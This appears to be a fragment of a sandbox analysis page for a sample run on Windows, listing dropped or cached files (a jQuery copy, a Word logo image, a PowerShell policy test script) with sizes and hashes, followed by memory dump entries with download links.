e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\~DFB71A0E0957E52144.TMP

Filesize
16KB

MD5
d34cbe59295491682f5ed1251fee86c7

SHA1
ec89e777def92de5440d45b2ee2bad4403142580

SHA256
c033c34d5ac260d5c53fe34357e9f635d8bbe5c4c0a780b871f70e93bb6e31f8

SHA512
d7b1a4eff2c6b5f1ba87b247ece35953fd223851a9744e6027eea71ff425ed203fb181bb38686bf8dec482fd158bf2fb1c89fae261c6f82c56cd15b43435b25b

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!121\MicrosoftEdge\Cache\2XHDHBUS\jquery-3.7.1.min[1].js

Filesize
85KB

MD5
2c872dbe60f4ba70fb85356113d8b35e

SHA1
ee48592d1fff952fcf06ce0b666ed4785493afdc

SHA256
fc9a93dd241f6b045cbff0481cf4e1901becd0e12fb45166a8f17f95823f0b1a

SHA512
bf6089ed4698cb8270a8b0c8ad9508ff886a7a842278e98064d5c1790ca3a36d5d69d9f047ef196882554fc104da2c88eb5395f1ee8cf0f3f6ff8869408350fe

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!121\MicrosoftEdge\Cache\DOPKESET\Microsoft_Word_2013-2019_logo.svg[1].png

Filesize
11KB

MD5
54f6c4438aa6a6aabfcbebed60006dca

SHA1
baa6a06b80f87073c056a384db5082fa15093579

SHA256
a245359e5759bcf270d8984ed9d786a0cd3bd07cdab16aaa3defbd433da3deca

SHA512
742bfec47a30ff819deeae1d18780fa99231a72149da9b6eda20a35fd4117c3f2cd214a60fe043c63ec7ba1e888f3802b1ad991986ced1ca7fa7696b944e53c3

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!121\MicrosoftEdge\Cache\R4VABXPY\background[1].gif

Filesize
33KB

MD5
93274e55e00ae52f106b73a5aa1427bf

SHA1
0f79006cb14e536ac73cf93c2b8e4fffc33a8a10

SHA256
9555652e90608548f0584c2bdb61bbd6069c90065a400e6b675c5f930bde6ad8

SHA512
a0176647a1e0503fcccfee77b7c52513b8b405b477348cdf58c6387898ec28825f063c1d1682a5b7477fda581418927a8968b6070685b2d76df34dc486589697

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!121\Microsoft\Windows\3720402701\2219095117.pri

Filesize
207KB

MD5
e2b88765ee31470114e866d939a8f2c6

SHA1
e0a53b8511186ff308a0507b6304fb16cabd4e1f

SHA256
523e419d2fa2e780239812d36caa37e92f8c3e6a5cd9f18f0d807c593effa45e

SHA512
462e8e6b4e63fc6781b6a9935b332a1dc77bfb88e1de49134f86fd46bd1598d2e842902dd9415a328e325bd7cdee766bd9473f2695acdfa769ffe7ba9ae1953d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w4expvrg.kxs.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/600-16-0x00000186F9B00000-0x00000186F9B10000-memory.dmp

Filesize
64KB

Download
memory/600-35-0x00000186FDFE0000-0x00000186FDFE2000-memory.dmp

Filesize
8KB

Download
memory/600-112-0x00000186818B0000-0x00000186818B1000-memory.dmp

Filesize
4KB

Download
memory/600-111-0x00000186818A0000-0x00000186818A1000-memory.dmp

Filesize
4KB

Download
memory/600-0-0x00000186F9620000-0x00000186F9630000-memory.dmp

Filesize
64KB

Download
memory/1976-2110-0x00007FFFA3E20000-0x00007FFFA480C000-memory.dmp

Filesize
9.9MB

Download
memory/1976-2068-0x00000203F5A10000-0x00000203F5A86000-memory.dmp

Filesize
472KB

Download
memory/1976-2064-0x00000203F4FF0000-0x00000203F5000000-memory.dmp

Filesize
64KB

Download
memory/1976-2083-0x00000203F4FF0000-0x00000203F5000000-memory.dmp

Filesize
64KB

Download
memory/1976-2106-0x00000203F4FF0000-0x00000203F5000000-memory.dmp

Filesize
64KB

Download
memory/1976-2065-0x00000203F4FC0000-0x00000203F4FE2000-memory.dmp

Filesize
136KB

Download
memory/1976-2062-0x00000203F4FF0000-0x00000203F5000000-memory.dmp

Filesize
64KB

Download
memory/1976-2061-0x00007FFFA3E20000-0x00007FFFA480C000-memory.dmp

Filesize
9.9MB

Download
memory/3564-100-0x000001B194490000-0x000001B194492000-memory.dmp

Filesize
8KB

Download
memory/3564-146-0x000001B1942E0000-0x000001B1942E2000-memory.dmp

Filesize
8KB

Download
memory/3564-91-0x000001B195520000-0x000001B195522000-memory.dmp

Filesize
8KB

Download
memory/3564-89-0x000001B195500000-0x000001B195502000-memory.dmp

Filesize
8KB

Download
memory/3564-87-0x000001B1954E0000-0x000001B1954E2000-memory.dmp

Filesize
8KB

Download
memory/3564-84-0x000001B195110000-0x000001B195112000-memory.dmp

Filesize
8KB

Download
memory/3564-58-0x000001B1942B0000-0x000001B1942B2000-memory.dmp

Filesize
8KB

Download
memory/3564-56-0x000001B183DF0000-0x000001B183DF2000-memory.dmp

Filesize
8KB

Download
memory/3564-53-0x000001B183D60000-0x000001B183D62000-memory.dmp

Filesize
8KB

Download
memory/4312-223-0x0000020057D00000-0x0000020057D20000-memory.dmp

Filesize
128KB

Download
memory/4312-274-0x0000020058310000-0x0000020058410000-memory.dmp

Filesize
1024KB

Download
memory/4312-347-0x000002005D520000-0x000002005D540000-memory.dmp

Filesize
128KB

Download
memory/4312-348-0x000002005D5E0000-0x000002005D600000-memory.dmp

Filesize
128KB

Download